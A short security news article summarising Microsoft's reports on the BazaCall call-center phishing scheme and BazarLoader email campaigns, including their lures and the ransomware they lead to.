The Security Intelligence team at Microsoft is once again raising an alarm about a call center phishing attacks it calls BazaCall.
Multiple active campaigns use the BazarLoader to deploy a wide range of payloads.
“We are tracking multiple active email campaigns that use BazarLoader to deliver a wide range of payloads. These campaigns appear disparate but share a common trait: their tactics attempt to challenge conventional email security solutions and best practices,” Microsoft said in a tweet.
‘Stolen Images’, the Bazarloader campaign Microsoft has been tracking, uses fake email addresses and copyright infringement forms about “stolen images” to trick users into downloading fraudulent software.
Another technique is to trick victims into opening emails that they think are from trusted sources.
Attackers also use weaponized Word docs in email attachments:
“A recent campaign challenges the best practice of only opening emails from known contacts: it uses compromised accounts to hijack email threads and attach a Word document in a password-protected ZIP file. The doc has a macro that launches MSHTA to download BazarLoader,” Microsoft said.
Microsoft first detected BazaCall in June, which was mainly used to send phishing emails with fraudulent claims about expired trial subscriptions and impending payments.
The emails usually do not contain links to web pages. Instead, they encourage potential victims to contact a call center.
The first contact point is a call center operator who discusses the details of the fake issue. They then convince the victim to visit a website that will supposedly allow them to cancel their subscription. The operator then provides instruction on how to install some necessary tool, which in reality is malware.
The BazaCall backdoor allows actors to install ransomware, such as Ryuk and Conti.
The reason why they’re notable is that they don’t use regular phishing methods nor send malicious emails. Instead, they use their mobile devices and voice to avoid getting spotted by email security tools.
“BazarLoader is a first-stage malware that allows remote attackers to gain control over an affected device, exfiltrate data, and install ransomware payloads – notably Conti. The multi-component and evasive nature of these attacks requires comprehensive protection,” Microsoft notes.